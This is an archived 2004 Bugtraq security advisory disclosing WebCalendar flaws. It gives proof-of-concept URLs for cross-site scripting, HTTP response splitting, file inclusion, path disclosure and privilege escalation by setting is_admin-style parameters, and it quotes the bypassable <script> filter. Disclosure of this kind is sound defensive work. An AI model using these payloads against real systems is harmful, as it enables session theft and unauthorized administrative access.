Multiple Vulnerabilities in WebCalendar

From: Joxean Koret (joxeankoret_at_yahoo.es)
Date: 11/10/04

Next message: Jonathan Angliss: "[SquirrelMail Security Advisory] Cross Site Scripting in encoded text"

Previous message: Paul Starzetz: "Linux ELF loader vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 9 Nov 2004 23:06:06 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)

---------------------------------------------------------------------------
              Multiple Vulnerabilities in WebCalendar
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

WebCalendar - Web Calendar Application

WebCalendar is a PHP application used to
maintain a calendar for a single user
or an intranet group of users. It can also be
configured as an event calendar.

Web : http://webcalendar.sourceforge.net

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerabilities in various
scripts.

A1. WebCalendar check the <script>any</script>
format of XSS attacks but
doesn't check <img src based attacks. To test the
vulnerabilities you can try
the following POCs:

http://>/demo/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001

http://>/demo/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009

http://>/demo/usersel.php?form=editentryform.elements[20];
%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2

http://>/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001

http://>/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001

http://>/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>

http://>/demo/includes/styles.php?FONTS=asdf}%0A--></style><script>alert(document.cookie)</script>
NOTE: Almost any GLOBAL parameter in this script
is vulnerable

B. HTTP Response Splitting Error

B1. Due to a poor input validation in the script
login.php HTTP Response Splitting
attacks are possible. You can try the vulnerability
with the following POC :

http://>/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi
to all

C. Possible code execution

C1. If an attacker is abble to upload a file via ftp or
other system to the web directory
there is a flaw that allows to execute any file in the
web tree. To try the vulnerability
you can try this url :

http://>/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other

Note: Almost this is a full path disclosure.

D. Full Path Disclosure

D1. Because of a poor validation of the parameter
enconded_login in the PHP script
validate.php, there is a vulnerability that shows
the full path of the script in the
web server.

http://>/demo/includes/validate.php?encoded_login=
(Full Path Disclosure)

E. Admin Privileges

E1. To make various actions you need to be the
administrator of the webcalendar
application but various scripts are vulnerable to
Variable Poisoning attacks.
Privilege escalation is possible using the following
methods :

Example 1 :

You doesn't have permission:

http://>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true

But using it yes:

http://>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true

Example 2 :

http://>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true&id=

Example 3 :

No permission ->
http://webcalendar.sourceforge.net/demo/upcoming.php
Permission Granted :) ->
http://webcalendar.sourceforge.net/demo/upcoming.php?public_must_be_enabled=true&public_access=Y

Notes
~~~~~

The poor method that uses to protect against XSS
attacks in the script functions.php
is the following :

// This code is a temporary hack to make the
application work when
// register_globals is set to Off in php.ini (the
default setting in
// PHP 4.2.0 and after).
if ( ! empty ( $HTTP_GET_VARS ) ) {
  while (list($key, $val) =
@each($HTTP_GET_VARS)) {
    // don't allow anything to have <script> in it...
    if ( ! is_array ( $val ) ) {
      if ( preg_match ( "/<\s*script/i", $val ) ) {
        echo "Security violation!"; exit;
      }
    }

Is very easy to by pass these basic security checks
by using Unicode encoded strings,
or using any other valid XSS attack, such as <img
src attacks.

More Notes
~~~~~~~~~~

The developers (in special Jeff Hoover) of
WebCalendar has been demostrated
seriousness with the fixes and responses about
these errors.

The fix:
~~~~~~~~

The problems has been fixed in the CVS repository.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its
demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of
using the information or demonstrations provided
in any part of this
advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

        Joxean Koret at
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

Next message: Jonathan Angliss: "[SquirrelMail Security Advisory] Cross Site Scripting in encoded text"

Previous message: Paul Starzetz: "Linux ELF loader vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

SecurityFocus Microsoft Newsletter #83
... MICROSOFT VULNERABILITY SUMMARY ... Microsoft IIS CodeBrws.ASP Source Code Disclosure Vulnerability ... Microsoft Internet Explorer History List Script Injection ... Microsoft Windows 2000 Lanman Denial of Service Vulnerability ...
(Focus-Microsoft)
SecurityFocus Microsoft Newsletter #84
... The most critical piece of vulnerability assessment is remediation. ... MICROSOFT VULNERABILITY SUMMARY ... IcrediBB Script Injection Vulnerability ... WorkforceROI XPede Unprotected Administrative Facilities... ...
(Focus-Microsoft)
Re: Hacking to Xp box
... I think there was a misunderstanding in the firewall point: ... you need to find some vulnerability that could be exploited to run ... > restricts most of the attacks that use anonymous connections. ... > Audit your website security with Acunetix Web Vulnerability Scanner: ...
(Pen-Test)
Re: Hacking to Xp box
... I think there was a misunderstanding in the firewall point: ... you need to find some vulnerability that could be ... > restricts most of the attacks that use anonymous connections. ... > Audit your website security with Acunetix Web Vulnerability ...
(Pen-Test)
Re: Hacking to Xp box
... I think there was a misunderstanding in the firewall point: ... you need to find some vulnerability that could be exploited to run ... > restricts most of the attacks that use anonymous connections. ... > Audit your website security with Acunetix Web Vulnerability Scanner: ...
(Pen-Test)

www.derkeiler.com > Mailing-Lists > securityfocus > bugtraq > 2004-11